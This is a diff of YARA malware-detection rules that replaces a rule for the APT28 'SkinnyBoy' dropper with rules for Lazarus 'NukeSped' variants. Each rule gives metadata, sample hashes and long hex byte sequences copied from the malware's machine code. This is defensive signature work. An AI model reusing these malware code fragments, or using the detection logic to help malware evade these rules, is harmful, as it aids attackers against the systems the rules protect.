-		$s1 = { 55 8b ec 81 ec 48 01 00 00 a1 00 00 01 10 33 c5 89 45 fc 53 56 57 6a 00 6a 00 6a 00 8b c2 6a 00 68 6c ef 00 10 89 85 d0 fe ff ff 89 8d cc fe ff ff 89 85 e4 fe ff ff c7 85 c0 fe ff ff 01 00 00 00 c7 85 d8 fe ff ff 00 00 00 00 c7 85 dc fe ff ff 00 00 00 00 ff 15 e4 b1 00 10 8b 1d a4 b0 00 10 8b f0 89 b5 d4 fe ff ff ff d3 8b 3d d4 b1 00 10 85 f6 74 26 6a 04 8d 85 ec fe ff ff 50 6a 06 56 c7 85 ec fe ff ff c0 27 09 00 ff d7 6a 04 8d 85 ec fe ff ff 50 6a 05 56 ff d7 ff d3 85 f6 74 22 6a 01 6a 00 6a 03 6a 00 6a 00 68 bb 01 00 00 ff b5 cc fe ff ff 56 ff 15 cc b1 00 10 89 85 d8 fe ff ff ff d3 8b 4d 08 8b 3d e8 b1 00 10 81 f9 00 00 a0 00 0f 83 a7 01 00 00 68 03 01 00 00 8d 85 f1 fe ff ff 6a 00 50 c6 85 f0 fe ff ff 00 e8 3c 33 00 00 83 c4 0c ba 01 00 00 00 6a 00 6a 01 8d 8d f0 fe ff ff e8 55 f7 ff ff 83 c4 08 8d 55 08 8d 8d e4 fe ff ff e8 94 f6 ff ff 8d bd f0 fe ff ff 8d 4f 01 8a 07 47 84 c0 75 f9 8b 75 08 2b f9 8d 04 37 50 6a 08 89 85 e0 fe ff ff ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 57 8d 8d f0 fe ff ff 51 50 89 85 d0 fe ff ff e8 62 6e 00 00 8b 85 d0 fe ff ff 83 c4 0c 03 c7 56 8b b5 e4 fe ff ff 56 50 e8 49 6e 00 00 83 c4 0c 56 6a 00 ff 15 b4 b0 00 10 50 a1 b8 b0 00 10 ff d0 57 8d 85 f0 fe ff ff 6a 00 50 e8 96 32 00 00 83 c4 0c 8d 8d d4 fe ff ff 6a 01 ff b5 e0 fe ff ff ff b5 d0 fe ff ff e8 8a f3 ff ff 85 c0 0f 84 7c 03 00 00 8b 85 d4 fe ff ff 8b 3d e8 b1 00 10 85 c0 74 03 50 ff d7 8b 85 d8 fe ff ff 85 }
-		$s2 = { 33 d2 8b c1 b9 00 00 20 00 f7 f1 33 c9 89 8d e4 fe ff ff 3b ca 89 95 b8 fe ff ff 1b d2 f7 da 03 d0 89 95 c4 fe ff ff 0f 84 98 02 00 00 8b ff 8b b5 b8 fe ff ff 85 f6 74 09 8d 42 ff 8b fe 3b c8 74 05 bf 00 00 20 00 57 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 8b 8d e4 fe ff ff 0f af cf 03 8d d0 fe ff ff 57 8b f0 51 56 89 b5 ec fe ff ff e8 c9 6c 00 00 83 c4 0c 8d 85 f1 fe ff ff 68 03 01 00 00 6a 00 50 c6 85 f0 fe ff ff 00 e8 1c 31 00 00 8b 85 e4 fe ff ff 83 c4 0c 40 6a 00 ff b5 c4 fe ff ff 8b d0 8d 8d f0 fe ff ff 89 85 e4 fe ff ff e8 27 f5 ff ff 83 c4 08 8d 85 e0 fe ff ff 50 6a 00 6a 01 57 56 c7 85 e0 fe ff ff 00 00 00 00 ff 15 24 b0 00 10 85 c0 74 4c ff b5 e0 fe ff ff 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 8b f0 8d 85 e0 fe ff ff 50 56 6a 01 57 8b bd ec fe ff ff 57 ff 15 24 b0 00 10 57 6a 00 ff 15 b4 b0 00 10 50 a1 b8 b0 00 10 ff d0 8b bd e0 fe ff ff 89 b5 ec fe ff ff 8d b5 f0 fe ff ff 8d 4e 01 8a 06 46 84 c0 75 f9 2b f1 8d 04 3e 50 6a 08 89 85 c8 fe ff ff ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 56 8d 8d f0 fe ff ff 51 50 89 85 bc fe ff ff e8 d8 6b 00 00 8b 8d bc fe ff ff 83 c4 0c 03 ce 57 8b bd ec fe ff ff 57 51 e8 bf 6b 00 00 83 c4 0c 57 6a 00 ff 15 b4 b0 00 10 50 ff 15 b8 b0 00 10 56 8d 85 f0 fe ff ff 6a 00 50 e8 0d 30 00 00 8b b5 c0 fe ff ff 8b bd bc fe ff ff 83 c4 0c 8d 8d d4 fe ff ff 56 ff b5 c8 fe ff ff 57 e8 fb f0 ff ff 85 c0 0f 84 c9 00 00 00 85 f6 0f 84 c1 00 00 00 8b 85 d4 fe ff ff 8b 35 e8 b1 00 10 85 }
-		$s3 = { 55 8b ec 83 e4 f8 81 ec 34 02 00 00 a1 00 00 01 10 33 c4 89 84 24 30 02 00 00 53 56 57 6a ff ff 35 28 1b 01 10 ff 15 4c b0 00 10 ff 35 28 1b 01 10 ff 15 80 b0 00 10 8b 35 b8 b0 00 10 8b 3d b4 b0 00 10 8d 44 24 10 50 8d 54 24 10 c7 44 24 10 00 00 00 00 c7 44 24 14 00 00 00 00 e8 df 0a 00 00 8b 4c 24 14 83 c4 04 85 c9 0f 84 e6 02 00 00 8b 54 24 0c 33 c0 33 db c7 44 24 20 00 00 00 00 89 44 24 1c 85 c9 0f 84 c2 02 00 00 8d 64 24 00 8b 34 13 8d 04 13 56 6a 08 ff d7 50 ff 15 ec b0 00 10 8b c8 8b 44 24 0c 83 c0 04 56 03 c3 50 51 89 4c 24 24 e8 a7 7e 00 00 8b 44 24 18 03 c3 83 c4 0c 8b 44 06 04 50 6a 08 89 44 24 1c ff d7 50 ff 15 ec b0 00 10 ff 74 24 14 8b f8 8b 44 24 10 03 c3 83 c6 08 03 c6 50 57 e8 72 7e 00 00 83 c4 0c 68 04 01 00 00 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 68 00 00 00 f0 6a 18 6a 00 8b f0 6a 00 8d 44 24 34 50 c7 44 24 38 00 00 00 00 c7 44 24 3c 00 00 00 00 ff 15 18 b0 00 10 }
-		$s4 = { ff 15 a4 b0 00 10 8d 44 24 28 50 6a 00 6a 00 68 0c 80 00 00 ff 74 24 34 ff 15 14 b0 00 10 ff 15 a4 b0 00 10 6a 00 ff 74 24 18 57 ff 74 24 34 ff 15 0c b0 00 10 ff 15 a4 b0 00 10 6a 00 8d 44 24 30 50 56 6a 02 ff 74 24 38 c7 44 24 40 04 01 00 00 ff 15 10 b0 00 10 ff 74 24 28 ff 15 00 b0 00 10 6a 00 ff 74 24 28 ff 15 04 b0 00 10 8b 54 24 2c 8b 44 24 18 }
-		$s5 = { 50 68 04 01 00 00 ff 15 a8 b0 00 10 8d 44 24 30 50 ff 15 a0 b1 00 10 68 18 ee 00 10 8d 44 24 34 50 ff 15 9c b0 00 10 b8 4d 5a 00 00 66 39 07 0f 85 b2 00 00 00 6a 00 68 80 00 00 00 6a 04 6a 00 6a 02 68 00 00 00 40 8d 44 24 48 50 ff 15 40 b0 00 10 8b f0 ff 15 a4 b0 00 10 83 fe }
-		$s6 = { 6a 00 8d 44 24 28 50 ff 74 24 1c c7 44 24 30 00 00 00 00 57 56 ff 15 38 b0 00 10 56 ff 15 44 b0 00 10 68 80 00 00 00 8d 44 24 34 50 ff 15 48 b0 00 10 8d 44 24 30 50 ff 15 a4 b1 00 10 85 c0 74 2d 8d 44 24 30 50 ff 15 b0 b0 00 10 8b f0 6a 01 56 ff 15 a0 b0 00 10 8d 4c 24 20 51 a3 20 1b 01 10 ff d0 56 89 44 24 20 ff 15 f4 b0 00 10 e8 ad f3 ff ff 57 8b 3d b4 b0 00 10 6a 00 ff d7 8b 35 b8 b0 00 10 50 ff d6 ff 74 24 18 6a 00 ff d7 50 ff d6 8b 44 24 1c 85 c0 74 12 8b 54 24 20 50 b9 4c ef 00 10 e8 77 0c 00 00 83 c4 04 8b 54 24 0c 8b 0c 13 8d 04 13 8d 04 19 83 c3 08 8b 44 10 04 03 c1 03 d8 3b 5c 24 10 0f 82 42 fd ff ff 52 6a 00 ff d7 50 ff d6 68 00 dd 6d 00 ff 35 28 1b 01 10 ff 15 4c b0 00 10 85 c0 0f 85 d4 fc ff ff }
+		$seq1 = { 48 8b ce e8 9e 0c f9 ff 48 8b 5c 24 20 48 8b 4c 24 28 49 8b d7 41 ff c5 ff 15 20 72 08 00 4c 8b f8 48 85 c0 0f 85 4c ff ff ff 48 8b b4 24 88 00 00 00 48 8b 4c 24 28 33 d2 ff 15 f7 71 08 00 4c 8b ac 24 90 00 00 00 4d 85 e4 0f 84 7f 01 00 00 48 8b ac 24 80 00 00 00 4d 8b c4 48 8b cd 48 8b d6 ff 53 48 49 8b cc 8b f0 e8 88 2c f8 ff 4c 8b bc 24 98 00 00 00 85 c0 0f 8e fb 00 00 00 0f 1f 84 00 00 00 00 00 41 8b d6 49 8b cc e8 95 2e f8 ff 48 8b f8 44 3b f6 75 75 49 89 07 e9 c4 00 00 00 48 8b 5c 24 20 45 33 c0 48 8b ce 41 8d 50 01 e8 a1 4b f9 ff 85 c0 0f 84 43 ff ff ff 49 8b d7 48 8b cb e8 ce e7 ff ff 48 8b d8 48 85 c0 0f 84 2c ff ff ff 49 8b cf ff 15 71 71 08 00 8b 15 ff e0 12 00 4c 8b c3 48 8b ce 48 89 03 e8 45 0c f9 ff 4d 85 e4 75 08 e8 2b 2b f8 ff 4c 8b e0 48 8b d6 49 8b cc e8 cd 2c f8 ff e9 fa fe ff ff 8b 15 ce e0 12 00 48 8b cf e8 ca 0b f9 ff 48 8b d8 48 85 c0 74 39 48 8b 48 10 ff 15 d8 70 08 00 48 8b 4b 08 33 d2 ff 15 d4 70 08 00 48 8b 0b 48 85 c9 74 06 ff 15 0e 71 08 00 41 b8 3a 06 00 00 48 8d 15 b1 71 0d 00 }
+		$seq2 = { 4c 8d 84 24 d0 00 00 00 4c 89 b4 24 90 01 00 00 48 8d 15 d8 a2 17 00 48 8b cd e8 50 e1 ff ff 8b 44 24 40 83 f8 02 74 05 83 f8 17 75 0c 83 7c 24 44 01 75 05 41 b6 01 eb 03 45 32 f6 48 8b 5c 24 28 45 84 f6 74 14 f6 85 74 0e 00 00 08 74 0b 48 8b d3 48 8b ce e8 15 03 00 00 48 8b cb e8 5d f4 ff ff 45 84 f6 74 17 f7 85 74 0e 00 00 00 10 00 00 74 0b 48 8b d3 48 8b cd e8 d1 01 00 00 48 83 bd 38 07 00 00 00 74 33 b2 01 48 8b cd e8 1d f1 fe ff 48 8b 8d 40 07 00 00 45 33 c0 48 8b d3 ff 95 38 07 00 00 33 d2 48 8b cd 44 8b f0 e8 fd f0 fe ff 41 83 fe 02 75 51 41 b4 01 8b 44 24 40 83 f8 02 74 05 83 f8 17 75 5a 48 8d 4c 24 50 e8 ac 81 02 00 44 8b 44 24 40 44 8b c8 48 8b d3 48 8b ce e8 d9 f8 ff ff 8b f8 85 c0 74 37 48 8b d3 48 8b ce e8 68 eb ff ff b8 07 00 00 00 83 ff 01 0f 44 f8 }
+		$seq3 = { 48 8b d0 48 8d 4d 80 41 ff d4 48 8b cb ff 15 f2 fa 1e 00 48 8d 95 e0 00 00 00 48 8d 4d 80 41 ff d7 f6 47 3c 02 48 8d 8d 90 00 00 00 48 0f 44 4c 24 50 e8 f6 04 00 00 4c 8b f0 48 85 c0 0f 84 05 fe ff ff 48 8b 47 28 49 8b d6 4c 8b 0f 4c 8b 47 10 48 85 c0 74 53 48 8d 8d e0 00 00 00 48 89 4c 24 40 48 8d 0d 94 90 15 00 48 89 44 24 38 8b 47 38 89 44 24 30 48 8b 47 08 48 89 44 24 28 48 8b 44 24 58 48 89 44 24 20 e8 e0 42 fc ff 48 8b 4f 28 48 8d 15 b9 8e 15 00 48 8b d8 e8 3d 7a fd ff 85 c0 74 2a ff 47 38 eb 25 48 8d 85 e0 00 00 00 48 89 44 24 28 48 8d 0d a1 90 15 00 48 8b 44 24 58 48 89 44 24 20 e8 a2 42 fc ff 48 8b d8 49 8b ce ff 15 2e fa 1e 00 48 85 db 0f 84 68 fd ff ff 4c 8b 47 20 4d 85 c0 74 27 48 8b d3 48 8d 0d aa 90 15 00 e8 75 42 fc ff 48 8b cb 4c 8b f0 ff 15 01 fa 1e 00 4d 85 f6 0f 84 3b fd ff ff 49 8b de 4c 8b 47 30 4d 85 c0 74 27 48 8b d3 48 8d 0d 8a 90 15 00 e8 45 42 fc ff 48 8b cb 4c 8b f0 ff 15 d1 f9 1e 00 4d 85 f6 0f 84 0b fd ff ff 49 8b de f6 47 3c 02 74 27 48 8b d3 48 8d 0d 75 90 15 00 e8 18 42 fc ff 48 8b cb 48 8b f8 ff 15 a4 f9 1e 00 48 }
+		$seq4 = { 48 81 ec 08 03 00 00 48 8b 05 e2 61 23 00 48 33 c4 48 89 84 24 f0 02 00 00 33 d2 48 8d 8c 24 e0 00 00 00 41 b8 08 02 00 00 e8 c2 f5 16 00 41 b8 04 01 00 00 48 8d 94 24 e0 00 00 00 48 8d 0d c5 94 21 00 ff 15 07 ee 18 00 48 8d 8c 24 e0 00 00 00 ff 15 d1 ef 18 00 85 c0 74 63 33 d2 48 8d 4c 24 70 44 8d 42 68 e8 85 f5 16 00 b8 05 00 00 00 c7 44 24 70 68 00 00 00 66 89 84 24 b0 00 00 00 48 8d 8c 24 e0 00 00 00 48 8d 44 24 50 45 33 c9 48 89 44 24 48 45 33 c0 48 8d 44 24 70 33 d2 48 89 44 24 40 33 c0 48 89 44 24 38 48 89 44 24 30 89 44 24 28 89 44 24 20 ff 15 52 ed 18 00 48 8b 8c 24 f0 02 00 00 48 33 cc e8 c2 cf 16 00 48 }
+		$seq5 = { 48 89 74 24 48 48 8d 0d 99 5e 18 00 4c 89 74 24 50 48 8b d5 4c 89 7c 24 58 e8 5f 13 17 00 4c 8d b7 0c 08 00 00 49 63 06 85 c0 0f 84 b0 00 00 00 48 8b c8 48 c1 e1 03 ff 15 a8 5f 22 00 48 8b f0 48 85 c0 0f 84 04 01 00 00 45 33 ff ba 00 01 00 00 41 8b df 90 48 8b 07 48 85 c0 74 16 4c 39 78 28 74 08 8b cb ff c3 48 89 04 ce 48 8b 00 48 85 c0 75 ea 48 83 c7 08 48 83 ea 01 75 d8 49 63 16 4c 8d 0d ce 01 00 00 41 b8 08 00 00 00 48 8b ce e8 c0 14 17 00 85 db 74 3e 4c 8b f6 49 8b 0e e8 c1 03 00 00 48 8b f8 48 8b cd 48 85 c0 0f 84 85 00 00 00 4c 8b c0 48 8d 15 58 5a 18 00 e8 33 a8 ff ff 48 8b cf ff 15 22 5f 22 00 41 ff c7 49 83 c6 08 44 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 300KB and 4 of ( $seq* )
 }
-rule ARKBIRD_SOLG_MAL_Skinnyboy_Dropper_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Lazarus_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect SkinnyBoy Dropper"
+		description = "Detect a variant of NukeSped malware"
 		author = "Arkbird_SOLG"
-		id = "1ea4cfe7-d44d-5cdb-8436-cb2b09dd2e56"
-		date = "2021-05-01"
-		modified = "2021-06-06"
-		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Dropper_Jun_2021_1.yara#L1-L19"
+		id = "0f5d42c0-d6dc-573b-9227-787ccbcaa83d"
+		date = "2021-06-19"
+		modified = "2021-06-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-19/Lazarus/APT_Lazarus_Jun_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "805bc5bb5833a75d68df2a6ce828d70b2257809a3699fdca5e621aae6bdc5070"
+		logic_hash = "ea4ce93d54b9b8e5d1d5bb64d37ac26839e2fa3200da3057597d83c4be6d129f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		hash1 = "12331809c3e03d84498f428a37a28cf6cbb1dafe98c36463593ad12898c588c9"
+		hash1 = "5c2f339362d0cd8e5a8e3105c9c56971087bea2701ea3b7324771b0ea2c26c6c"
+		hash2 = "2dff6d721af21db7d37fc1bd8b673ec07b7114737f4df2fa8b2ecfffbe608a00"
+		hash3 = "1177105e51fa02f9977bd435f9066123ace32b991ed54912ece8f3d4fbeeade4"
 		tlp = "White"
-		adversary = "APT28"
+		adversary = "Lazarus"
 
 	strings:
-		$s1 = { 55 8b ec b8 48 12 00 00 e8 a3 52 00 00 a1 00 d0 40 00 33 c5 89 45 fc 56 57 68 08 02 00 00 8d 85 cc ed ff ff 50 51 ff 15 2c 80 40 00 6a 00 68 80 00 00 00 6a 03 6a 00 6a 01 68 00 00 00 80 8d 85 cc ed ff ff 50 c7 85 b8 ed ff ff 00 00 00 00 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b f8 83 fe ff 74 12 6a 00 56 ff 15 58 80 40 00 56 8b f8 ff 15 20 80 40 00 8d 85 c8 ed ff ff 50 8d 95 b8 ed ff ff 8d 8d cc ed ff ff 89 bd c8 ed ff ff e8 bc fd ff ff 8b bd b8 ed ff ff b8 4d 5a 00 00 83 c4 04 66 39 07 74 1b 68 c1 00 00 00 ff 15 34 80 40 00 5f 5e 8b 4d fc 33 cd e8 fe 08 00 00 8b e5 }
-		$s2 = { 8b 47 3c 81 3c 07 50 45 00 00 75 d9 8b 47 1c 8b b5 c8 ed ff ff 8b 4f 20 2b f0 85 c9 74 04 8b f1 2b f0 53 56 6a 08 ff 15 0c 80 40 00 50 ff 15 08 80 40 00 8b 4f 1c 56 03 cf 8b d8 51 53 89 9d c4 ed ff ff e8 96 5d 00 00 68 08 02 00 00 8d 85 f4 f9 ff ff 6a 00 50 e8 33 25 00 00 83 c4 18 8d 85 f4 f9 ff ff 50 6a 00 6a 00 68 1c 80 00 00 6a 00 ff 15 30 81 40 00 b8 18 00 00 00 68 ee 00 00 00 66 89 85 0c fc ff ff 8d 85 0e fc ff ff 6a 00 50 c7 85 fc fb ff ff 00 00 3f 00 c7 85 00 fc ff ff 47 00 5b 00 c7 85 04 fc ff ff 09 00 19 00 c7 85 08 fc ff ff 08 00 0d 00 e8 d1 24 00 00 f3 0f 7e 05 c4 bd 40 00 a1 d4 bd 40 00 68 ec 00 00 00 89 85 0c ff ff ff 66 0f d6 85 fc fe ff ff f3 0f 7e 05 cc bd 40 00 8d 85 10 ff ff ff 6a 00 50 66 0f d6 85 04 ff ff ff e8 93 24 00 00 83 c4 18 33 }
-		$s3 = { 0f b7 8c 05 fc fe ff ff 66 31 8c 05 fc fb ff ff 0f b7 8c 05 fe fe ff ff 66 31 8c 05 fe fb ff ff 0f b7 8c 05 00 ff ff ff 66 31 8c 05 00 fc ff ff 0f b7 8c 05 02 ff ff ff 66 31 8c 05 02 fc ff ff 83 c0 08 3d 00 01 00 00 72 b6 8d 85 f4 f9 ff ff 50 ff 15 38 81 40 00 8d 85 fc fb ff ff 50 8d 85 f4 f9 ff ff 50 ff 15 40 80 40 00 6a 00 8d 85 f4 f9 ff ff 50 ff 15 28 80 40 00 68 d8 00 00 00 8d 85 24 fe ff ff 6a 00 50 c7 85 fc fd ff ff 1f 00 33 00 c7 85 00 fe ff ff 58 00 4e 00 c7 85 04 fe ff ff 5d 00 1b 00 c7 85 08 fe ff ff 59 00 27 00 c7 85 0c fe ff ff 70 00 2d 00 c7 85 10 fe ff ff 16 00 13 00 c7 85 14 fe ff ff 03 00 1c 00 c7 85 18 fe ff ff 0d 00 2a 00 c7 85 1c fe ff ff 07 00 51 00 c7 85 20 fe ff ff 08 00 13 00 e8 8f 23 00 00 f3 0f 7e 05 d8 bd 40 00 66 a1 00 be 40 00 66 0f d6 85 fc fe ff ff f3 0f 7e 05 e0 bd 40 00 66 0f d6 85 04 ff ff ff f3 0f 7e 05 e8 bd 40 00 66 0f d6 85 0c ff ff ff f3 0f 7e 05 f0 bd 40 00 68 d6 00 00 00 66 89 85 24 ff ff ff 66 0f d6 85 14 ff ff ff f3 0f 7e 05 f8 bd 40 00 8d 85 26 ff ff ff 6a 00 50 66 0f d6 85 1c ff ff ff e8 1f 23 00 00 83 c4 18 33 }
-		$s4 = { 0f b7 84 0d fc fe ff ff 66 31 84 0d fc fc ff ff 0f b7 84 0d fe fe ff ff 66 31 84 0d fe fc ff ff 0f b7 84 0d 00 ff ff ff 66 31 84 0d 00 fd ff ff 0f b7 84 0d 02 ff ff ff 66 31 84 0d 02 fd ff ff 83 c1 08 81 f9 00 01 00 00 72 b5 8d 85 f4 f9 ff ff 50 ff 15 38 81 40 00 8d 85 fc fc ff ff 50 8d 85 f4 f9 ff ff 50 ff 15 40 80 40 00 6a 00 6a 00 8d 85 c0 ed ff ff 50 6a 00 6a 01 56 53 8b 1d 00 80 40 00 c7 85 c0 ed ff ff 00 00 00 00 ff d3 ff b5 c0 ed ff ff 6a 08 ff 15 0c 80 40 00 50 ff 15 08 80 40 00 6a 00 6a 00 8d 8d c0 ed ff ff 51 50 6a 01 56 ff b5 c4 ed ff ff 89 85 bc ed ff ff ff d3 8b 85 c0 ed ff ff 6a 00 68 80 00 00 00 6a 04 6a 00 6a 02 89 85 b8 ed ff ff 68 00 00 00 40 8d 85 f4 f9 ff ff 50 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b 1d 38 80 40 00 83 fe ff 74 55 3d b7 00 00 00 75 0b 6a 00 6a 00 6a 00 56 ff }
-		$s5 = { 55 8b ec 83 ec 0c a1 00 d0 40 00 33 c5 89 45 fc 53 8b 5d 08 56 57 6a 00 68 80 00 00 00 6a 03 6a 00 6a 01 68 00 00 00 80 51 89 55 f4 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b f8 83 fe ff 74 67 83 ff 02 74 62 6a 00 56 ff 15 58 80 40 00 89 03 85 c0 74 47 c7 45 f8 00 00 00 00 ff 15 0c 80 40 00 ff 33 6a 08 50 ff 15 08 80 40 00 8b 4d f4 6a 00 89 01 8d 4d f8 51 ff 33 50 56 ff 15 14 80 40 00 56 ff 15 20 80 40 00 8b c7 5f 5e 5b 8b 4d fc 33 cd e8 d4 0a 00 00 8b e5 }
-		$s6 = { 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f }
+		$seq1 = { 48 8b ce e8 8a 2c 00 00 48 8b d8 48 85 c0 0f 84 28 06 00 00 4c 8b c6 33 d2 48 8b c8 e8 11 56 00 00 8d 4e fc 48 8d 57 04 4c 63 c1 48 8b cb e8 af 3a 00 00 33 c0 48 8d 4c 24 30 48 89 4c 24 28 45 33 c9 4c 8b c3 33 d2 33 c9 89 44 24 30 89 44 24 20 ff 15 4b 49 01 00 48 85 c0 0f 84 d4 05 00 00 ba 88 13 00 00 48 8b c8 ff 15 9c 2c 02 00 48 8d 8d 91 00 00 00 33 d2 41 b8 ff 03 00 00 c6 85 90 00 00 00 00 e8 a9 55 00 00 48 8d 15 02 c1 01 00 48 8d 8d 90 00 00 00 e8 16 2b 00 00 48 8d 85 90 00 00 00 48 83 cb ff 48 ff c3 80 3c 18 00 75 f7 41 b2 84 ba 43 90 21 57 41 b8 c2 a2 a9 09 85 db 0f 8e 4b 05 00 00 4c 8d 8d 90 00 00 00 44 8b db 66 90 41 0f b6 01 41 0f b6 c8 4d 8d 49 01 32 ca 41 32 c2 44 22 d1 41 32 c0 42 8d 0c c5 00 00 00 00 32 c2 41 33 c8 41 88 41 ff 81 e1 f8 07 00 00 41 0f b6 c0 22 c2 c1 e1 14 44 32 d0 41 8b c0 44 8b c1 c1 e8 08 8d 0c 12 33 ca 44 0b c0 8b c2 c1 e1 04 c1 e0 07 33 ca 83 e1 80 33 c8 8b c2 c1 e1 11 c1 e8 08 8b d1 0b d0 49 ff }
+		$seq2 = { 48 8d ac 24 50 ff ff ff 48 81 ec b0 01 00 00 48 8b 05 82 09 02 00 48 33 c4 48 89 85 a0 00 00 00 44 8b 25 d5 38 02 00 4c 8b f9 48 8d 4d 91 33 d2 41 b8 03 01 00 00 c6 45 90 00 e8 59 66 00 00 b9 3c 00 00 00 ff 15 f6 3c 02 00 ff 15 88 59 01 00 8b c8 e8 51 42 00 00 e8 20 42 00 00 b9 3c 00 00 00 8b d8 83 e3 03 83 c3 08 ff 15 d1 3c 02 00 ff 15 63 59 01 00 8b c8 e8 2c 42 00 00 e8 fb 41 00 00 b9 3c 00 00 00 8b f8 83 e7 01 83 c7 05 ff 15 ac 3c 02 00 ff 15 3e 59 01 00 8b c8 e8 07 42 00 00 e8 d6 41 00 00 8b f0 b8 ab aa aa aa f7 e6 d1 ea 8d 0c 52 2b f1 83 eb 08 0f 84 30 03 00 00 ff cb 0f 84 68 02 00 00 ff cb 0f 84 9a 01 00 00 ff cb 0f 85 ef 04 00 00 8d 4b 3c ff 15 60 3c 02 00 ff 15 f2 58 01 00 8b c8 e8 bb 41 00 00 e8 8a 41 00 00 8b d8 b8 1f 85 eb 51 f7 e3 c1 ea 03 6b ca 19 2b d9 b9 3c 00 00 00 83 c3 0a ff 15 2f 3c 02 00 ff 15 c1 58 01 00 8b c8 e8 8a 41 00 00 e8 59 41 00 00 44 8b f0 b8 ab aa aa aa 41 f7 e6 c1 ea 02 8d 0c 52 03 c9 44 2b f1 b9 3c 00 00 00 41 81 c6 d7 07 00 00 ff 15 f5 3b 02 00 ff 15 87 58 01 00 8b c8 e8 50 41 00 00 e8 1f 41 00 00 44 8b e8 b8 ab aa aa aa 41 f7 e5 c1 ea 03 8d 0c 52 c1 e1 02 44 2b e9 b9 3c 00 00 00 41 ff c5 ff 15 be 3b 02 00 ff 15 50 58 01 00 8b c8 e8 19 41 00 00 e8 e8 40 00 00 44 8b c0 b8 09 cb 3d 8d 41 f7 e0 c1 ea 04 6b ca 1d 44 2b c1 b9 7d 00 00 00 41 ff c0 44 89 44 24 74 e8 3e 3b 00 00 33 d2 44 8d 42 7d 48 8b c8 e8 d0 64 00 00 4c 8d 44 24 70 48 8d 0d d4 ce 01 00 ba 7c 00 00 00 c7 44 24 70 00 00 00 00 e8 c2 27 00 00 44 8b 44 24 70 48 8b d0 48 8b c8 48 89 44 24 78 e8 3d 25 00 00 48 8b 44 24 78 4c 8d 45 90 48 8b d0 4c 2b c0 0f 1f 40 00 66 66 0f 1f 84 00 00 00 00 00 0f b6 0a 48 8d 52 01 41 88 4c 10 ff 84 c9 75 f0 48 8b c8 e8 88 3a 00 00 8b 44 24 74 44 89 64 24 48 89 5c 24 40 89 44 24 38 44 89 6c 24 30 48 8d 55 90 44 8b cf 41 b8 04 00 00 00 49 8b cf 44 89 74 24 28 89 74 24 20 e8 b4 39 00 00 e9 5d 03 00 00 b9 3c 00 00 00 ff 15 cc 3a 02 00 ff 15 5e 57 01 00 8b c8 e8 27 40 00 00 e8 f6 3f 00 00 b9 79 00 00 00 8b d8 83 e3 03 e8 63 3a 00 00 33 d2 44 8d 42 79 48 8b c8 e8 f5 63 00 00 4c 8d 44 24 70 48 8d 0d 79 cd 01 00 ba 78 00 00 00 c7 44 24 70 00 00 00 00 e8 e7 26 00 00 44 8b 44 24 70 48 8b d0 48 8b c8 4c 8b f0 e8 64 24 00 00 4c 8d 45 90 49 8b d6 4d 2b c6 66 66 0f 1f 84 00 00 00 00 00 0f b6 0a 48 8d 52 01 41 88 4c 10 ff 84 c9 75 f0 49 8b ce e8 b8 39 00 00 44 89 64 24 38 8d 43 04 89 44 24 30 44 8d 4b 08 48 8d 55 90 41 b8 04 00 00 00 49 8b cf 89 74 24 28 89 }
+		$seq3 = { 48 89 5c 24 18 55 56 57 48 83 ec 70 48 8b 05 9d fe 01 00 48 33 c4 48 89 44 24 60 33 c0 48 8b d9 8b fa 8d 48 20 c6 44 24 48 00 48 89 44 24 49 48 89 44 24 51 e8 d7 31 00 00 48 8d 15 44 c6 01 00 48 8b f0 33 c0 48 8d 4c 24 48 48 89 06 48 89 46 08 48 89 46 10 4c 8b c3 48 89 46 18 e8 3f 13 00 00 48 8d 4c 24 48 ff 15 ac 50 01 00 bd 02 00 00 00 0f b7 cf 89 44 24 3c 66 89 6c 24 38 ff 15 a5 2e 02 00 8d 55 ff 44 8d 45 04 8b cd 66 89 44 24 3a ff 15 01 32 02 00 48 8b f8 48 83 f8 ff 75 20 48 8d 15 e1 c5 01 00 48 8b ce e8 81 30 00 00 48 0b df 48 ff c3 80 3c 1e 00 75 f7 e9 c9 00 00 00 48 8d 54 24 38 41 b8 10 00 00 00 48 8b c8 ff 15 f4 31 02 00 83 f8 ff 75 6b 48 8d 15 a8 c5 01 00 48 8b ce e8 48 30 00 00 48 83 cb }
+		$seq4 = { 40 55 48 8d ac 24 e0 fb ff ff 48 81 ec 20 05 00 00 48 8b 05 b8 fc 01 00 48 33 c4 48 89 85 10 04 00 00 48 8d 8d f1 00 00 00 33 d2 41 b8 03 01 00 00 c6 85 f0 00 00 00 00 e8 93 59 00 00 48 8d 8d 01 02 00 00 33 d2 41 b8 07 02 00 00 c6 85 00 02 00 00 00 e8 78 59 00 00 48 8d 4d e1 33 d2 41 b8 03 01 00 00 c6 45 e0 00 e8 63 59 00 00 48 8d 95 f0 00 00 00 41 b8 f4 01 00 00 33 c9 ff 15 2e 30 02 00 85 c0 0f 84 5e 01 00 00 48 8d 55 e0 b9 f4 01 00 00 48 89 9c 24 30 05 00 00 48 89 bc 24 38 05 00 00 ff 15 17 30 02 00 4c 8d 05 20 15 02 00 48 8d 4d e0 ba 04 01 00 00 e8 5a 37 00 00 48 8d 45 e0 4c 8d 0d f7 14 02 00 48 89 44 24 28 48 8d 85 f0 00 00 00 4c 8d 